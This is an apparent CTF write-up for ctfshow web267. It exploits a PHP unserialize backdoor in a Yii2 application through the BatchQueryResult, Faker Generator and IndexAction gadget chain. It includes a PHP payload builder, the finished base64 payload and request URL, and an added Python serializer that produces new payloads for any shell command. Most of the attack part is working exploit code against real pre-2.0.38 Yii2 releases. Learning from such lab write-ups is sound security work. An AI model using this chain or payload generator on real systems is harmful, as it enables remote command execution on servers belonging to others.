PHP deserialization challenges: exploiting the Yii framework

目标践行者 · 2023-11-12 · 50 reads

ctfshow web267

Log in with the weak credentials admin/admin.

The about page contains a hint pointing at view-source.

Visit the hinted page:

?r=site%2Fabout&view-source

The page source reveals:

///backdoor/shell

unserialize(base64_decode($_GET['code']))

The sink applies base64_decode() and then unserialize(), so the payload has to be built in the reverse order: serialize() first, then base64_encode(). Base64 also matters for a second reason: the serialized names of private and protected properties contain NUL bytes, which cannot travel in a query string as raw text.

Gadget chain (Yii2 before 2.0.38, where BatchQueryResult::__wakeup() was added to block it): yii\db\BatchQueryResult::__destruct() calls reset(), which calls $this->_dataReader->close(). With _dataReader pointing at a Faker\Generator, the undefined close() lands in Generator::__call(), which looks up $this->formatters['close'] and invokes it with call_user_func_array(). That callable is [IndexAction, 'run'], and yii\rest\IndexAction::run() executes call_user_func($this->checkAccess, $this->id), which here becomes shell_exec('cat /flag | tee 3.txt'). The payload is produced by the following script:

<?php
// Each namespace block declares a minimal stand-in for the real class, so that
// serialize() emits the same class and property names the target maps back onto
// the real Yii2 / Faker classes.
namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            // IndexAction::run() does call_user_func($this->checkAccess, $this->id)
            $this->checkAccess = 'shell_exec';
            $this->id = 'cat /flag | tee 3.txt';        // command to execute; output is written to the web root
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            // Generator::__call('close') resolves $this->formatters['close'] and invokes it
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{

    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            // BatchQueryResult::__destruct() -> reset() -> $this->_dataReader->close()
            $this->_dataReader=new Generator();
        }
    }
}
namespace{

    use yii\db\BatchQueryResult;

    // serialize() first, then base64_encode(): the reverse of the sink
    echo base64_encode(serialize(new BatchQueryResult()));
}
?>


The generated payload:

TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoyMToiY2F0IC9mbGFnIHwgdGVlIDMudHh0Ijt9aToxO3M6MzoicnVuIjt9fX19
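To make the on-the-wire format visible, here is an added example (not part of the original write-up) that re-implements the relevant subset of PHP's serialize() in Python and rebuilds the same chain, byte for byte, that the PHP script above produces. The class and property names are the real Yii2 / Faker ones; PhpObject, mangle, php_serialize, build_chain and build_payload are this example's own helper names. It shows the detail that most often breaks hand-edited payloads: private properties serialize as "\0ClassName\0prop" and protected ones as "\0*\0prop", and the s:N length counts those NUL bytes.

```python
import base64

# Added example: minimal PHP serializer in Python, rebuilding the Yii2 gadget chain.
# Helper names (PhpObject, mangle, php_serialize, build_chain, build_payload) are
# this example's own; class/property names are those of the real gadgets.


class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, value) triples,
    in declaration order, exactly as PHP's serialize() emits them."""

    def __init__(self, class_name, props):
        self.class_name = class_name
        self.props = props


def mangle(class_name, name, visibility):
    # PHP stores visibility inside the serialized property name:
    #   private   -> NUL + ClassName + NUL + prop
    #   protected -> NUL + "*" + NUL + prop
    #   public    -> prop
    # These NUL bytes are why the raw payload cannot be pasted into a URL as-is.
    if visibility == "private":
        return "\0%s\0%s" % (class_name, name)
    if visibility == "protected":
        return "\0*\0" + name
    return name


def php_serialize(value):
    """Serialize a subset of PHP types: null, bool, int, string, array, object."""
    if value is None:
        return "N;"
    if isinstance(value, bool):           # bool must be tested before int
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):            # length is the byte length, NULs included
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, list):           # PHP array with keys 0..n-1
        body = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, dict):           # PHP associative array
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle(value.class_name, n, vis)) + php_serialize(v)
            for n, vis, v in value.props
        )
        return 'O:%d:"%s":%d:{%s}' % (len(value.class_name), value.class_name,
                                      len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def build_chain(cmd):
    """BatchQueryResult -> Generator -> IndexAction chain for one shell command."""
    # yii\rest\IndexAction::run(): call_user_func($this->checkAccess, $this->id)
    index_action = PhpObject("yii\\rest\\IndexAction", [
        ("checkAccess", "public", "shell_exec"),
        ("id", "public", cmd),
    ])
    # Faker\Generator::__call('close') -> call_user_func_array($this->formatters['close'], ...)
    generator = PhpObject("Faker\\Generator", [
        ("formatters", "protected", {"close": [index_action, "run"]}),
    ])
    # yii\db\BatchQueryResult::__destruct() -> reset() -> $this->_dataReader->close()
    return PhpObject("yii\\db\\BatchQueryResult", [
        ("_dataReader", "private", generator),
    ])


def build_payload(cmd="cat /flag | tee 3.txt"):
    """serialize() first, then base64_encode(): the reverse of
    unserialize(base64_decode($_GET['code']))."""
    return base64.b64encode(php_serialize(build_chain(cmd)).encode()).decode()


if __name__ == "__main__":
    # Print the serialized form with NULs made visible, then the final payload.
    print(php_serialize(build_chain("id")).replace("\0", "\\0"))
    print(build_payload())
```

Run with the default command and the output is identical to the base64 string above; run with any other command to get a fresh payload without re-running PHP.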


Send the payload to the backdoor:

http://3f3f9ac5-03f1-4e54-88e7-c00f0a7834be.challenge.ctf.show/index.php?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoyMToiY2F0IC9mbGFnIHwgdGVlIDMudHh0Ijt9aToxO3M6MzoicnVuIjt9fX19

The page responds with an error:

An internal server error occurred.

This is expected and harmless. The chain fires from BatchQueryResult::__destruct(), and IndexAction::run() has already executed shell_exec() through call_user_func() before it continues into prepareDataProvider(), which throws because the crafted object carries no model class. call_user_func() also discards shell_exec()'s return value, so nothing is echoed back in the response; that is why the command pipes its output through tee into 3.txt in the web root instead.

Fetch http://3f3f9ac5-03f1-4e54-88e7-c00f0a7834be.challenge.ctf.show/3.txt to read the flag.

